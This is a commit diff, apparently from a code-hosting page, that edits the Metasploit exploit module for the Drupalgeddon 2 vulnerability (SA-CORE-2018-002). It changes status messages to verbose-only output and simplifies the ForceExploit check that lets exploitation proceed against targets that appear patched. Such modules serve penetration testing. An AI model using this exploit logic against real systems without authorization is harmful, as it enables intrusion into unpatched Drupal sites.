Update drupal_drupalgeddon2
parent
92a9c7184b
commit
d30bfe2cbf
|
@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
]
|
||||
],
|
||||
'DefaultTarget' => 0, # Automatic (PHP In-Memory)
|
||||
'DefaultOptions' => {'WfsDelay' => 2}, # Wait between and after attempts
|
||||
'DefaultOptions' => {'WfsDelay' => 2}, # Also seconds between attempts
|
||||
'Notes' => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}
|
||||
))
|
||||
|
||||
|
@ -143,22 +143,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
@version = target['Version'] || drupal_version
|
||||
|
||||
if @version
|
||||
print_status("Drupal #{@version} targeted at #{full_uri}")
|
||||
vprint_status("Drupal #{@version} targeted at #{full_uri}")
|
||||
checkcode = CheckCode::Detected
|
||||
else
|
||||
print_error('Could not determine Drupal version to target')
|
||||
vprint_error('Could not determine Drupal version to target')
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
|
||||
changelog = drupal_changelog(@version)
|
||||
|
||||
if changelog && changelog.include?('SA-CORE-2018-002')
|
||||
print_warning('Drupal appears patched in CHANGELOG.txt')
|
||||
vprint_warning('Drupal appears patched in CHANGELOG.txt')
|
||||
elsif changelog
|
||||
print_good('Drupal appears unpatched in CHANGELOG.txt')
|
||||
vprint_good('Drupal appears unpatched in CHANGELOG.txt')
|
||||
checkcode = CheckCode::Appears
|
||||
else
|
||||
print_error('Could not determine Drupal patch level')
|
||||
vprint_error('Could not determine Drupal patch level')
|
||||
end
|
||||
|
||||
token = rand_str
|
||||
|
@ -172,7 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
if check == CheckCode::Safe && datastore['ForceExploit'] == false
|
||||
if check == CheckCode::Safe && !datastore['ForceExploit']
|
||||
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue